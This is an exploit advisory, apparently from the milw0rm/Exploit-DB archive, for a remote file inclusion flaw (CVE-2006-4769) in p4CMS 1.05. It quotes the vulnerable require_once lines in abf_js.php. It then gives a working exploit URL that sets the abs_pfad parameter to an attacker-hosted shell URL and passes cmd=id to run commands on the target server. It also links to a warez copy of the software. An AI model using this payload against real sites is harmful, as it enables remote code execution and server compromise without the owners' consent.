p4CMS 1.05 - 'abs_pfad' Remote File Inclusion

Author: SHiKaA
type: webapps
platform: php
port: 
date_added: 2006-09-11  
date_updated:   
verified: 1  
codes: OSVDB-28762;CVE-2006-4769  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2350.txt  
#==============================================================================================
#p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar
#
#Version : v1.05
#
#================================================================================================
#Bug in : abf_js.php
#
#Vlu Code :
#--------------------------------
#
#                    @require_once($abs_pfad."include/config.inc.php");
#                    @require_once($abs_pfad."include/mysql-class.inc.php");
#                    @require_once($abs_pfad."include/functions.inc.php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]